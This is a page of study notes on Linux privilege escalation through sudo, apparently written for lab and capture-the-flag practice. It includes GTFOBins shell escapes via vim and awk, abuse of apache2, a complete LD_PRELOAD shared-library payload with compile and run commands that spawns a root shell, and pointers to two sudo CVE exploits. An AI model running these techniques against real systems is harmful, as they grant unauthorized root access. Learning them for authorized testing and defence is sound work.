Buy me a tea

Sudo

Sudo Shell Escaping

  • sudo -l will show us commands delegated to our user. See example of possible output below image

  • With the result of the command we can then check out on GTFOBins for comprehensive ways to escalate

Vim

  • Vim on Gtfobins the section of interest for us here is the following one: image

  • Let's try this command sudo vim -c ':!/bin/sh'

  • It works right away image

awk

  • Awk on GTFOBins the section of interest for us here is the following one: image

  • So let's try this sudo awk 'BEGIN {system("/bin/sh")}'

  • It works image

Intended Functionality

Example with Apache2

  • sudo -l we should see this: (root) NOPASSWD: /usr/sbin/apache2

  • Note: There are no entry on GTFOBins about apache2 but Google can do the trick ;) We could type something like "sudo apache2 privilege escalation"

  • Then we find an article that mentions this command to let us view system files.

Example with wget

  • See here an example with wget on veteransec's writeup of the HTB box called sunday.

LD_PRELOAD

  • sudo -l we should see something like this env_keep+=LD_PRELOAD

  • We are going to preload a user specific share library before any other share libraries

  • We need to write our malicious library that will privesc for us by changing our gid and uid to 0 (root). We put this code in a file named x.c

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

  • now we need to compile our library with gcc gcc -fPIC -shared -o /tmp/x.so x.c -nostartfiles

  • And now we need to set it as our user's preloaded library sudo LD_PRELOAD=/tmp/x.so apache2

  • We should be root image

CVE-2019-14287

  • CVE-2019-14287 on exploit-db

  • This vulnerability allows us to change our user id, we need to have some sudo rights delegated to us this works very well with right on /bin/bash

  • Checkout here a writeup of an example of exploitation

CVE-2019-18634

  • CVE-2019-18634 exploit by saleemrashid

  • This one is a buffer overflow

  • If we see that we have password feedback on (we can try any sudo command to check for this), it means that the option pwfeedback is turned on in /etc/sudoers and that makes it vulnerable to buffer overflow

  • We basically just need to run the provided exploit. Pour pratice on this check out this box on trhyhackme

Resources

LogoTCM Security Academyacademy.tcm-sec.com
Linux Privesc on TCM-Security Academy
PreviousPassword and file permissionNextSUID

Last updated